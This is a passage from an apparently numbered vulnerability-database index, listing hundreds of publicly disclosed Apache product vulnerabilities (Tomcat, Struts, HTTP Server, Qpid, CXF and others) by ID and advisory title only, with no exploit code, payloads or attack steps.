6670| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
6671| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
6672| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
6673| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
6674| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
6675| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
6676| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
6677| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
6678| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
6679| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
6680| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
6681| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
6682| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
6683| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
6684| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
6685| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
6686| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
6687| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
6688| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
6689| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
6690| [59670] Apache VCL Multiple Input Validation Vulnerabilities
6691| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
6692| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
6693| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
6694| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
6695| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
6696| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
6697| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
6698| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
6699| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
6700| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
6701| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
6702| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
6703| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
6704| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
6705| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
6706| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
6707| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
6708| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
6709| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
6710| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
6711| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
6712| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
6713| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
6714| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
6715| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
6716| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
6717| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
6718| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
6719| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
6720| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
6721| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
6722| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
6723| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
6724| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
6725| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
6726| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
6727| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
6728| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
6729| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
6730| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
6731| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
6732| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
6733| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
6734| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
6735| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
6736| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
6737| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
6738| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
6739| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
6740| [54798] Apache Libcloud Man In The Middle Vulnerability
6741| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
6742| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
6743| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
6744| [54189] Apache Roller Cross Site Request Forgery Vulnerability
6745| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
6746| [53880] Apache CXF Child Policies Security Bypass Vulnerability
6747| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
6748| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
6749| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
6750| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
6751| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
6752| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
6753| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
6754| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
6755| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
6756| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
6757| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
6758| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
6759| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
6760| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
6761| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
6762| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
6763| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
6764| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
6765| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
6766| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
6767| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
6768| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
6769| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
6770| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
6771| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
6772| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
6773| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
6774| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
6775| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
6776| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
6777| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
6778| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
6779| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
6780| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
6781| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
6782| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
6783| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
6784| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
6785| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
6786| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
6787| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
6788| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
6789| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
6790| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
6791| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
6792| [49290] Apache Wicket Cross Site Scripting Vulnerability
6793| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
6794| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
6795| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
6796| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
6797| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
6798| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
6799| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
6800| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
6801| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
6802| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
6803| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
6804| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
6805| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
6806| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
6807| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
6808| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
6809| [46953] Apache MPM-ITK Module Security Weakness
6810| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
6811| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
6812| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
6813| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
6814| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
6815| [46166] Apache Tomcat JVM Denial of Service Vulnerability
6816| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
6817| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
6818| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
6819| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
6820| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
6821| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
6822| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
6823| [44616] Apache Shiro Directory Traversal Vulnerability
6824| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
6825| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
6826| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
6827| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
6828| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
6829| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
6830| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
6831| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
6832| [42492] Apache CXF XML DTD Processing Security Vulnerability
6833| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
6834| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
6835| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
6836| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
6837| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
6838| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
6839| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
6840| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
6841| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
6842| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
6843| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
6844| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
6845| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
6846| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
6847| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
6848| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
6849| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
6850| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
6851| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
6852| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
6853| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
6854| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
6855| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
6856| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
6857| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
6858| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
6859| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
6860| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
6861| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
6862| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
6863| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
6864| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
6865| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
6866| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
6867| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
6868| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
6869| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
6870| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
6871| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
6872| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
6873| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
6874| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
6875| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
6876| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
6877| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
6878| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
6879| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
6880| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
6881| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
6882| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
6883| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
6884| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
6885| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
6886| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
6887| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
6888| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
6889| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
6890| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
6891| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
6892| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
6893| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
6894| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
6895| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
6896| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
6897| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
6898| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
6899| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
6900| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
6901| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
6902| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
6903| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
6904| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
6905| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
6906| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
6907| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
6908| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
6909| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
6910| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
6911| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
6912| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
6913| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
6914| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
6915| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
6916| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
6917| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
6918| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
6919| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
6920| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
6921| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
6922| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
6923| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
6924| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
6925| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
6926| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
6927| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
6928| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
6929| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
6930| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
6931| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
6932| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
6933| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
6934| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
6935| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
6936| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
6937| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
6938| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
6939| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
6940| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
6941| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
6942| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
6943| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
6944| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
6945| [20527] Apache Mod_TCL Remote Format String Vulnerability
6946| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
6947| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
6948| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
6949| [19106] Apache Tomcat Information Disclosure Vulnerability
6950| [18138] Apache James SMTP Denial Of Service Vulnerability
6951| [17342] Apache Struts Multiple Remote Vulnerabilities
6952| [17095] Apache Log4Net Denial Of Service Vulnerability
6953| [16916] Apache mod_python FileSession Code Execution Vulnerability
6954| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
6955| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
6956| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
6957| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
6958| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
6959| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
6960| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
6961| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
6962| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
6963| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
6964| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
6965| [15177] PHP Apache 2 Local Denial of Service Vulnerability
6966| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
6967| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
6968| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
6969| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
6970| [14106] Apache HTTP Request Smuggling Vulnerability
6971| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
6972| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
6973| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
6974| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
6975| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
6976| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
6977| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
6978| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
6979| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
6980| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
6981| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
6982| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
6983| [11471] Apache mod_include Local Buffer Overflow Vulnerability
6984| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
6985| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
6986| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
6987| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
6988| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
6989| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
6990| [11094] Apache mod_ssl Denial Of Service Vulnerability
6991| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
6992| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
6993| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
6994| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
6995| [10478] ClueCentral Apache Suexec Patch Security Weakness
6996| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
6997| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
6998| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
6999| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
7000| [9921] Apache Connection Blocking Denial Of Service Vulnerability
7001| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
7002| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
7003| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
7004| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
7005| [9733] Apache Cygwin Directory Traversal Vulnerability
7006| [9599] Apache mod_php Global Variables Information Disclosure Weakness
7007| [9590] Apache-SSL Client Certificate Forging Vulnerability
7008| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
7009| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
7010| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
7011| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
7012| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
7013| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
7014| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
7015| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
7016| [8898] Red Hat Apache Directory Index Default Configuration Error
7017| [8883] Apache Cocoon Directory Traversal Vulnerability
7018| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
7019| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
7020| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
7021| [8707] Apache htpasswd Password Entropy Weakness
7022| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
7023| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
7024| [8226] Apache HTTP Server Multiple Vulnerabilities
7025| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
7026| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
7027| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
7028| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
7029| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
7030| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
7031| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
7032| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
7033| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
7034| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
7035| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
7036| [7255] Apache Web Server File Descriptor Leakage Vulnerability
7037| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
7038| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
7039| [6939] Apache Web Server ETag Header Information Disclosure Weakness
7040| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
7041| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
7042| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
7043| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
7044| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
7045| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
7046| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
7047| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
7048| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
7049| [6117] Apache mod_php File Descriptor Leakage Vulnerability
7050| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
7051| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
7052| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
